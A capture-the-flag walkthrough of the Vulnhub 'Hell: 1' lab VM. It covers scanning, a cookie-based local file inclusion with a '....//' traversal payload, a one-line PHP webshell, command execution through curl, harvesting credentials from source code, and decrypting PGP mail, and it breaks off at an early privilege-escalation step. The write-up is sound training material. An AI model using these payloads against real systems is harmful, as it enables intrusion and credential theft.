[Vulnhub]Hell: 1

“This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts!

A few of the skills needed can be seen in some posts on http://netsec.ws. Otherwise enjoy the experience - remember that although vulnerabilities might not jump out at you straight away you may need to try some variations on the normal to get past the protections in place!“ – Peleus

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali Linux (10.10.10.131/24)

Target: Hell (10.10.10.146/24)

Vulnerability & Exploit

  • Local File Include vulnerability existed in one of cookie variable
  • File upload function without any content filter will save any evil code into pre-defined file ‘note.txt’ under folder ‘/tmp/’
  • Sensitive information found in ‘login.php’ which disclose jack’s SSH password and Database password
  • Use jack’s PGP private key file to unlock the encrypted email file and found SSH password for another account ‘milk_4_life’
  • ‘game’ program has sticky bit set and will call another program ‘chmod’ when user win the game, but it has not been using absolute path for ‘chmod’
  • ‘Rockyou’ dictionary based brute force attacking and cracked the password for ‘Truecrypt’ container file found in george’s home folder, found SSH private key file for another account ‘bazza’
  • Very similar vulnerability as in ‘game’ happened in another program ‘part2’ which can be expolited to privilege escape to ‘oj’
  • ‘echo’ program has Format String vulnerability which should be able to be exploited to get ROOT
  • ‘Truecrypt’ has vulnerability which can make attacker to get ROOT

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Web information gathering and interacting with the web server [firefox, burp proxy]
  • brute fuzz to find hidden files and paths [wfuzz]
  • Local file including vulnerability detect and exploit [curl]
  • Truecrypt password brute force attacking [truecrack]
  • Analysis and write script to win ‘game’ program [python]
  • Poked around in the file system and found sensitive information
  • Hijack executable program to get privilege escalation
  • Make evil truecrypt file to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as routine to detect the target’s IP address (10.10.10.146 in this case).

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# netdiscover -r 10.10.10.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                               
                                                                                                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                                                             
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 10.10.10.1      00:50:56:c0:00:08    01    060   VMWare, Inc.                                                                                               
 10.10.10.2      00:50:56:e2:f9:10    01    060   VMWare, Inc.                                                                                               
 10.10.10.146    00:0c:29:e2:78:6f    01    060   VMware, Inc.                                                                                               
 10.10.10.254    00:50:56:fb:67:d4    01    060   VMWare, Inc.

10.10.10.146 is our Target!

Next, run nmap to scan open services on the target.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~# nmap -sV -O -A -p- -T5 10.10.10.146

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-13 08:24 EDT
Nmap scan report for 10-10-10-146.tpgi.com.au (10.10.10.146)
Host is up (0.00044s latency).
Not shown: 65529 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f4:bb:f4:22:36:08:61:ef:74:2c:27:e0:b4:a2:69:d3 (DSA)
|   2048 0e:31:1d:cf:04:d0:63:fa:5c:76:f2:dc:22:1c:f1:7c (RSA)
|_  256 e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa (ECDSA)
80/tcp    open     http    Apache httpd 2.2.22 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries 
|_/personal/ /super_secret_login_path_muhahaha/
|_http-title: Have fun!
111/tcp   open     rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44490/tcp  status
|_  100024  1          52715/udp  status
666/tcp   open     doom?
1337/tcp  filtered waste
44490/tcp open     status  1 (RPC #100024)
...

ports 22 and 80 open, and two very interesting folders found on port 80: \personal and \super_secret_login_path_muhahaha\. Then using wfuzz to reveal more possible hidden folders and files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@kali:~# wfuzz -c --hc 404 -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt http://10.10.10.146/super_secret_login_path_muhahaha/FUZZ.php

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://10.10.10.146/super_secret_login_path_muhahaha/FUZZ.php
Payload type: file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

Total requests: 81643
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================

00001:  C=200     17 L          33 W      371 Ch    " - #"
00002:  C=200     17 L          33 W      371 Ch    " - # directory-list-lowercase-2.3-small.txt"
00003:  C=200     17 L          33 W      371 Ch    " - # Copyright 2007 James Fisher"
00004:  C=200     17 L          33 W      371 Ch    "on-Share Alike 3.0 License. To view a copy of this"
00005:  C=200     17 L          33 W      371 Ch    "# This work is licensed under the Creative Commons"
00006:  C=200     17 L          33 W      371 Ch    "sit http://creativecommons.org/licenses/by-sa/3.0/"
00007:  C=200     17 L          33 W      371 Ch    " - #"
00008:  C=200     17 L          33 W      371 Ch    " - #"
00009:  C=200     17 L          33 W      371 Ch    " Suite 300, San Francisco, California, 94105, USA."
00010:  C=200     17 L          33 W      371 Ch    "ed case insensative list, where entries were found"
00011:  C=200     17 L          33 W      371 Ch    " - # on atleast 3 different hosts"
00012:  C=200     17 L          33 W      371 Ch    "d a letter to Creative Commons, 171 Second Street,"
00016:  C=403     10 L          30 W      317 Ch    " - "
00017:  C=200     17 L          33 W      371 Ch    " - index"
00028:  C=200     17 L          33 W      371 Ch    " - #"
00063:  C=302      0 L           0 W        0 Ch    " - login"
00193:  C=200      5 L          19 W      163 Ch    " - mail"
00198:  C=200      2 L           2 W       19 Ch    " - users"
00470:  C=302     17 L          35 W      387 Ch    " - personal"
00572:  C=200      7 L          21 W      170 Ch    " - server"
01051:  C=200      5 L          20 W      179 Ch    " - notes"
01255:  C=302      1 L           0 W        2 Ch    " - check"
05186:  C=302     21 L          38 W      566 Ch    " - panel"
Stopping...

After I checked those revealed files, I found three interesting ones: 1.php, check.php and notes.php.

Having a look at 1.php, there is only one sentence: INTRUDER ALERT! which is in Red color and all Capital.

By playing check.php with Burp proxy, I noticed that if user input wrong username/password, the cookie variable failcount will increase. However when input the wrong username/password more than 3 times, a new cookie intruder will be added and the value is always 1.

Also the check.php will request personal.php and panel.php as well, something noticeable in panel.php is that the red color alert: INTRUDER ALERT! which is same as the content of 1.php.

So based on the above facts and analysis, I could guess that the panel.php has included the 1.php when user input wrong username/password over 3 times. As a result, I firstly modified the cookie value of intruder to ../../../../etc/passwd but the respond is not excepted… might be the admin set a filter here or something like that. After I read the page in OWASP testing guide, I finally found a well-working payload: ....//....//....//....//....//....//etc//passwd.

Here is a Local File Include vulnerability found.

Now it’s time to move to notes.php.

Taking a close look at notes.php, I noticed that we can write anything and it will be saved in temporary folder(mostly possible is /tmp/ in Linux) as the name is note.txt.

After some trying, it is proved that the note.txt file is saved in /tmp/ folder.

Then I wrote one-line PHP webshell to note.txt, then use File Include vulnerability found previously to include the webshell.

1
<?php system($_GET['cmd']); ?>

Now I have already got a webshell and can run system command which is ready to poke around on the server file system.

In order to make the life easier, I use curl instead of burp proxy to interactive with target server.

First to request check.php, we can see that cookies PHPSESSID and failcount have been set.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
root@kali:~/hell# curl -v -L http://10.10.10.146/super_secret_login_path_muhahaha/check.php -c cookies -b cookies
* About to connect() to 10.10.10.146 port 80 (#0)
*   Trying 10.10.10.146...
* connected
* Connected to 10.10.10.146 (10.10.10.146) port 80 (#0)
> GET /super_secret_login_path_muhahaha/check.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 10.10.10.146
> Accept: */*
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 302 Found
< Date: Wed, 15 Jul 2015 00:06:37 GMT
< Server: Apache/2.2.22 (Debian)
< X-Powered-By: PHP/5.4.4-14+deb7u11
* Added cookie PHPSESSID="cb11eurq57no9kbu8k09pvt0d5" for domain 10.10.10.146, path /, expire 0
< Set-Cookie: PHPSESSID=cb11eurq57no9kbu8k09pvt0d5; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Location: personal.php
* Added cookie failcount="1" for domain 10.10.10.146, path /super_secret_login_path_muhahaha/, expire 0
< Set-Cookie: failcount=1
< Vary: Accept-Encoding
< Content-Length: 2
< Content-Type: text/html
<
* Ignoring the response-body
* Connection #0 to host 10.10.10.146 left intact
* Issue another request to this URL: 'http://10.10.10.146/super_secret_login_path_muhahaha/personal.php'
* Re-using existing connection! (#0) with host (nil)
* Connected to (nil) (10.10.10.146) port 80 (#0)
> GET /super_secret_login_path_muhahaha/personal.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 10.10.10.146
> Accept: */*
> Cookie: failcount=1; PHPSESSID=cb11eurq57no9kbu8k09pvt0d5
>

root@kali:~/hell# cat cookies
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

10.10.10.146  FALSE   /   FALSE   0   PHPSESSID   cb11eurq57no9kbu8k09pvt0d5
10.10.10.146  FALSE   /super_secret_login_path_muhahaha/  FALSE   0   failcount   1

New cookie “intruder” has been set after running the same command 3 times.

1
2
3
4
5
6
7
8
root@kali:~/hell# cat cookies 
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

10.10.10.146  FALSE   /   FALSE   0   PHPSESSID   cb11eurq57no9kbu8k09pvt0d5
10.10.10.146  FALSE   /super_secret_login_path_muhahaha/  FALSE   0   failcount   3
10.10.10.146  FALSE   /super_secret_login_path_muhahaha/  FALSE   0   intruder    1

Then I change the value of cookie intruder to include our webshell file: /tmp/note.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
root@kali:~/hell# cat cookies
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

10.10.10.146  FALSE   /   FALSE   0   PHPSESSID   cb11eurq57no9kbu8k09pvt0d5
10.10.10.146  FALSE   /super_secret_login_path_muhahaha/  FALSE   0   failcount   3
10.10.10.146  FALSE   /super_secret_login_path_muhahaha/  FALSE   0   intruder    ....//....//....//....//....//....//tmp//note.txt
root@kali:~/hell# curl -v http://10.10.10.146/super_secret_login_path_muhahaha/panel.php?cmd=id -c cookies -b cookies
* About to connect() to 10.10.10.146 port 80 (#0)
*   Trying 10.10.10.146...
* connected
* Connected to 10.10.10.146 (10.10.10.146) port 80 (#0)
> GET /super_secret_login_path_muhahaha/panel.php?cmd=id HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 10.10.10.146
> Accept: */*
> Cookie: intruder=....//....//....//....//....//....//tmp//note.txt; failcount=3; PHPSESSID=cb11eurq57no9kbu8k09pvt0d5
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 302 Found
< Date: Wed, 15 Jul 2015 00:16:47 GMT
< Server: Apache/2.2.22 (Debian)
< X-Powered-By: PHP/5.4.4-14+deb7u11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Location: index.php
< Vary: Accept-Encoding
< Content-Length: 620
< Content-Type: text/html
<

<HTML>
<CENTRE>
<H2> Folders </H2>
<TABLE style="width:700px" align="center">
<TR>
  <TD><A HREF="server.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="mail.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="users.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="personal.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="notes.php"><IMG SRC='folder.png'></A></TD>
</TR>
<TR>
  <TD><H4>Server Status</H4></TD>
  <TD><H4>Mail Status</H4></TD>
  <TD><H4>Auth Users</H4></TD>
  <TD><H4>Personal Folder</H4></TD>
  <TD><H4>Notes</H4></TD>
</TR>
</CENTRE>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</HTML>
* Connection #0 to host 10.10.10.146 left intact
* Closing connection #0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~/hell# curl http://10.10.10.146/super_secret_login_path_muhahaha/panel.php?cmd=ls+-l+/home -c cookies -b cookies

<HTML>
<CENTRE>
<H2> Folders </H2>
<TABLE style="width:700px" align="center">
<TR>
  <TD><A HREF="server.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="mail.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="users.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="personal.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="notes.php"><IMG SRC='folder.png'></A></TD>
</TR>
<TR>
  <TD><H4>Server Status</H4></TD>
  <TD><H4>Mail Status</H4></TD>
  <TD><H4>Auth Users</H4></TD>
  <TD><H4>Personal Folder</H4></TD>
  <TD><H4>Notes</H4></TD>
</TR>
</CENTRE>
total 20
drwx------ 3 bazza       bazza       4096 Jul 13 01:43 bazza
drwx--x--x 3 george      george      4096 Jul 12 07:27 george
drwx------ 5 jack        jack        4096 Jul 12 05:28 jack
drwx------ 2 milk_4_life milk_4_life 4096 Jul 12 06:59 milk_4_life
drwx------ 2 oj          oj          4096 Jul 14 01:49 oj
</HTML>

Here we can see there are 5 users under folder /home: bazza, george, jack, milk_4_life and oj

Moving to jack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~/hell# curl http://10.10.10.146/super_secret_login_path_muhahaha/panel.php?cmd=ls+-l+/var/www/ -c cookies -b cookies

<HTML>
<CENTRE>
<H2> Folders </H2>
<TABLE style="width:700px" align="center">
<TR>
  <TD><A HREF="server.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="mail.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="users.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="personal.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="notes.php"><IMG SRC='folder.png'></A></TD>
</TR>
<TR>
  <TD><H4>Server Status</H4></TD>
  <TD><H4>Mail Status</H4></TD>
  <TD><H4>Auth Users</H4></TD>
  <TD><H4>Personal Folder</H4></TD>
  <TD><H4>Notes</H4></TD>
</TR>
</CENTRE>
total 112
-rw-r--r-- 1 www-data www-data 87841 Jun 17  2014 comic.png
-rwxr--r-- 1 www-data www-data  7846 Jun 20  2014 echoserver.bak
-rw-r--r-- 1 www-data www-data   466 Jun 20  2014 index.html
drwxr-xr-x 2 www-data www-data  4096 Jun 20  2014 personal
-rw-r--r-- 1 www-data www-data    80 Jun 17  2014 robots.txt
drwxr-xr-x 2 www-data www-data  4096 Jul 13 05:32 super_secret_login_path_muhahaha
</HTML>

Here I found some sensitive information in login.php file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
root@kali:~/hell# curl http://10.10.10.146/super_secret_login_path_muhahaha/panel.php?cmd=cat+login.php -c cookies -b cookies

<HTML>
<CENTRE>
<H2> Folders </H2>
<TABLE style="width:700px" align="center">
<TR>
  <TD><A HREF="server.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="mail.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="users.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="personal.php"><IMG SRC='folder.png'></A></TD>
  <TD><A HREF="notes.php"><IMG SRC='folder.png'></A></TD>
</TR>
<TR>
  <TD><H4>Server Status</H4></TD>
  <TD><H4>Mail Status</H4></TD>
  <TD><H4>Auth Users</H4></TD>
  <TD><H4>Personal Folder</H4></TD>
  <TD><H4>Notes</H4></TD>
</TR>
</CENTRE>
<?PHP
session_start();

function login(){
 
 $username = mysql_escape_string($_POST["username"]);
 $password = mysql_escape_string($_POST["password"]);
 // mysql_connect("127.0.0.1", "Jack", "zgcR6mU6pX") or die ("Server Error"); I'll change this back once development is done. Got sick of typing my password.  
 mysql_connect("127.0.0.1", "www-data", "website") or die("Server Error");
 mysql_select_db("website") or die("Server Error");
 $sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
 $res = mysql_query($sql) or die("Server Error");
 $row = mysql_fetch_row($res);
 if ($row[0]) {
     return 1;
 } else {
     return 0;
 }
}

if (login()) {
 $_SESSION["valid"] = 1;
 setcookie(time()+600);
 header('Location: index.php');
} else {
 header('Location: index.php?the_user_is_a_failure=1');
}
?>
</HTML>

From the comment, I got credential: jack / zgcR6mU6pX I also got mysql’s login credential is www-data / website

Trying SSH login as jack with discovered password and it works! Now I am jack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
root@kali:~# ssh jack@10.10.10.146
jack@10.10.10.146's password:
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sun Jul 12 05:12:42 2015 from 10.10.10.131
$ id
uid=1001(jack) gid=1001(jack) groups=1001(jack)
$ pwd
/home/jack
$ ls -l
total 4
drwx------ 2 jack jack 4096 Jun 18  2014 g0tmi1k_pics
$ ls -l g0tmi1k_pics
total 284
-rwx------ 1 jack jack 180289 Dec  1  2010 1.jpg
-rwx------ 1 jack jack  29494 Sep 12  2013 2.jpg
-rwx------ 1 jack jack  72070 Jun 18  2014 3.jpg
$ ls -lah
total 32K
drwx------ 5 jack jack 4.0K Jul 12 05:28 .
drwxr-xr-x 7 root root 4.0K Jul  5  2014 ..
-rwx------ 1 jack jack    1 Jun 22  2014 .bash_logout
-rwx------ 1 jack jack 3.4K Jun 18  2014 .bashrc
drwx------ 2 jack jack 4.0K Jun 18  2014 g0tmi1k_pics
drwx------ 2 jack jack 4.0K Jul 12 05:30 .gnupg
drwx------ 2 jack jack 4.0K Jun 18  2014 .pgp
-rwx------ 1 jack jack  675 Jan  1  2013 .profile
$ cd .pgp
$ ls -lah
total 20K
drwx------ 2 jack jack 4.0K Jun 18  2014 .
drwx------ 5 jack jack 4.0K Jul 12 05:28 ..
-rwx------ 1 jack jack   39 Jun 18  2014 note
-rwx------ 1 jack jack 1.8K Jun 18  2014 pgp.priv
-rwx------ 1 jack jack  890 Jun 18  2014 pgp.pub
$ cat note
The usual password as with everything.
$ cat pgp.priv
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0

lQOsBFOg9v8BCACbr++BXlL9e4N6pzcrHkNZGANB7Ii3vHc0Nj37kCm7ZuTMx4LN
bpWrqGb9W9grS9YQ7xSEkBShaKlWMilb4rqrM/tmDyuGt9UozCrVrCTfaZdPl72o
u1QO1DxTT9/iFwlb6AAjTvJGQQx92PQeShEOeTtycH+Xz4tx1ezHpbA4HK9ijftR
lyZy+y9GPSqYLsIU3N8WtnrTJRfSMiU/AGv/GWpykp3tlHjIL0YSHfvUppe4xAil
54J+LN7se3jKuFcRM+i9TF08hsTtM6azl7X4yyEDhHcvWgFY/vyggEwe6/ZP1IKG
zzAWi0sx7tlZLxyr9AFSXLwLvbhUpR3M5rJBABEBAAH/AwMC8ht700SVD+1guMSO
NKMnwLvKkrmW32b/zo/x4g4MbhUs1BXIvHfGw1ArsEpkMucb8utDqGzcwctR00de
jTr/nFo0gKxBMgc34e9HNTI0iFlVYWDFZqU4ie6/Pyt8qvZHOe5Aq0qPsCkcdMME
bR6EQng1ZBXX7zHCF2TobPnIxp5CGI2WUwXmXaGQS/hRriIcAhDx5ZFFqOdVQWES
mLo5Rd205/M4mungbUvwrHayu6ZGume+VXs630YaacNiBFpXnPDfKOCipZ+EhYsz
7febMxXj3mANwLXQfyTZOIXPzMptE11fbDA8jpy9m0vMy5ZCpJnp/VoTaaUxMz45
OeUI9nKTx9P1lGPC9hYidshg3Sg5Iz/qqmL/byAv1bUV2YOdJlAS1XY9Jj/wNrYz
yG9ASw5nfp0ChhLYnnU4dgfEk5bajGvgnhZAlb/+yNvJ5eUcwivjFC8jJUwlrZ+Z
oj1XAC4148JsjcQHW1d7yONc4iI7tSubMNa5GfBal1BxMRLP3nSZ4ICl67gTjrKH
ztiMKAefip3ywnRomfn7q9raJQ8TsKp0+REVy05mhZMZ1AdMlZzhTz8cYy8II6yr
qSxuJARfJ95FGYPrASMfJ+aZfPNk5RDnH5d92vxm/nIWexdayZqqQJG4MzOhtrjx
a0YouqQhxvD2aKslEBJ1S/D4D40xkVI+oaI+aM/6X+XzC2XVJgm7G8FvmtE09BUm
fAMUxE/bgsv33QXsURtelfuoZRLz/OmwybXpwv+Zen0n8hpjQEAOhqD4eieIxH9j
7W6ijInh9XD8jcnUa4eHw7WDa0LPtyQSbPZB1hZou6z8pAZY0LxhmstpPjSYfdKR
HRjhRuu0tdZ2PrKx1wKooo/iiJdZ0Cgizlu4k76rDrQSamFja0Bjb3dsb3ZlcnMu
Y29tiQEcBBABAgAGBQJToPb/AAoJEL26wSU/GKsKnk0H/iWvOGuWwge8VteqxPip
yu2LwvLzjbHAeWwBmsg69h+Yl5l8Y+3B9aoCpnjM2QmMAFHxVA8L6Z4UIyhNJ90Y
l18rYZec9cDUrflowd/A4QVrJNCV/5kCyPeQ03mzGHnlTTvb/qBMymmpVBeP3JoK
vZkGYzFBmrt7q19b3VcvexLTwtLtch8NUOt6719UFRvxE+EXu4JbItr7dSqfYDbh
zHsfGaeU1hCQJg/n83IRxTBsc7h1jIOxraovzbErqpZ6YeYhCK5oo38dJVpz9Daa
quU6lGTizKWX3HS29HQl+PJvzoHyj3T6Aw71BZF4lZNrJmzxHqhVYuRWptioyTWo
tqg=
=SCkw
-----END PGP PRIVATE KEY BLOCK-----
$

After poking around, I found .pgp hidden folder which include PGP private key and public key in jack’s home directory, take a note and will be used later.

Moving to milk_4_life

Then I was trying to login to MYSQL database and found jack’s web admin password is g0tmi1k69

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
$ mysql -uwww-data -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.37-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| website            |
+--------------------+
2 rows in set (0.01 sec)

mysql> use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| users             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+----------+-----------+
| username | password  |
+----------+-----------+
| Jack     | g0tmi1k69 |
+----------+-----------+
1 row in set (0.00 sec)

mysql>

Then I found there is an email for jack but it is encrypted by PGP, so I need using pgp private key (which is found before) to decrypt the message. Here is a handy gpg help guide.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ ls -alh /var/mail
total 16K
drwxrwsr-x  4 root   mail   4.0K Jul 15 09:25 .
drwxr-xr-x 12 root   root   4.0K Jun 17  2014 ..
drwxr-sr-x  2 george george 4.0K Jun 20  2014 george
drwxr-sr-x  3 jack   jack   4.0K Jul  5  2014 jack
$ ls -alh /var/mail/jack
total 12K
drwxr-sr-x 3 jack jack 4.0K Jul  5  2014 .
drwxrwsr-x 4 root mail 4.0K Jul 15 09:25 ..
drwxr-sr-x 2 root mail 4.0K Jun 18  2014 received
$ ls -alh /var/mail/jack/received
total 12K
drwxr-sr-x 2 root mail 4.0K Jun 18  2014 .
drwxr-sr-x 3 jack jack 4.0K Jul  5  2014 ..
-rw-r--r-- 1 root mail  709 Jun 18  2014 message.eml
$ cat /var/mail/jack/received/message.eml
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0

hQEMA726wSU/GKsKAQf/ZnGxyaHQ6wMhSzpbn2J2uVKoPFS3tHdnBzJ18kswBwOm
yff3Joe5RTtMgdjydD+37DSg6SikjcdzJiHV3y5QHqxVcNt5xo0BdYNCWoqjdMzJ
3g50VEwMg5DZwLvTmUr4f+CJ7bc/Cv2hHazKXnT7s71lqBLSCCsNwZuWpxYW1OMX
7CNE92QXayltmQ0GLajIMtzmGlszgwQkVjQ2h9wMGelVYHi5hYsEZzIdh6/9Jo24
rerlq1CY6/T70KsY6GyBoU3iKFgsIkwcb6whrlR/6SCK2vNmLlz2AfDSITYY+6vZ
MWXhiYbZSRyHq7gaYRKS6kzG6uLlsyq4YnQzhz8M+sm4dePDBvs7U6yAPJf4oAAH
9o01Fp3IJ1isvVMH5Fr8MwQjOAuo6Yh6TwbOrI/MVpphJQja8gDKVYr2tlqNS5me
V8xJ7ZUxsh67w/5s5s1JgEDQt+f4wckBc8Dx5k9SbS9iRUbZ0oLJ3IM8cUj3CDoo
svsh0u4ZWj4SrLsEdErcNX6gGihRl/xs3qdVOpXtesSvxEQcWHLqtMY94tb29faD
+oQPjG3V4cSY5r566esUAlCn7ooYyx6Dug==
=svWU
-----END PGP MESSAGE-----
$ gpg --allow-secret-key-import --import .pgp/pgp.priv
gpg: key 3F18AB0A: secret key imported
gpg: key 3F18AB0A: "jack@cowlovers.com" not changed
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
$ gpg /var/mail/jack/received/message.eml

You need a passphrase to unlock the secret key for
user: "jack@cowlovers.com"
2048-bit RSA key, ID 3F18AB0A, created 2014-06-18

gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
      "jack@cowlovers.com"
gpg: /var/mail/jack/received/message.eml: unknown suffix
Enter new filename [text.txt]: 
gpg: WARNING: message was not integrity protected
$ cat text.txt
Ok Jack. I've created the account 'milk_4_life' as per your request. Please stop emailing me about this now or I'm going to talk to HR like we discussed. 

The password is '4J0WWvL5nS'
$

Here we got user milk_4_life has password: 4J0WWvL5nS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ssh milk_4_life@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is e0:b0:ba:37:93:39:65:33:c6:44:99:50:2c:1b:f6:fa.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
milk_4_life@localhost's password: 
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 12 07:02:03 2015 from 10.10.10.131
$ id
uid=1002(milk_4_life) gid=1002(milk_4_life) groups=1002(milk_4_life)
$ pwd
/home/milk_4_life
$ ls -l
total 12
---s--x--x 1 george      george      5743 Jun 19  2014 game
-rwxr-xr-x 1 milk_4_life milk_4_life  473 Jul 11 20:36 win.py
$ ls -alh
total 36K
drwx------ 2 milk_4_life milk_4_life 4.0K Jul 12 06:59 .
drwxr-xr-x 7 root        root        4.0K Jul  5  2014 ..
-rw------- 1 milk_4_life milk_4_life   51 Jul 12 07:24 .bash_history
-rwx------ 1 milk_4_life milk_4_life    1 Jun 22  2014 .bash_logout
-rwx------ 1 milk_4_life milk_4_life 3.4K Jan  1  2013 .bashrc
---s--x--x 1 george      george      5.7K Jun 19  2014 game
-rwx------ 1 milk_4_life milk_4_life  675 Jan  1  2013 .profile

Moving to george

Here we can see that there is program game which is owned by george and sticky bit has been set. That means this program has high possibility to be exploited for privilege escaping to george.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ ss -lnt
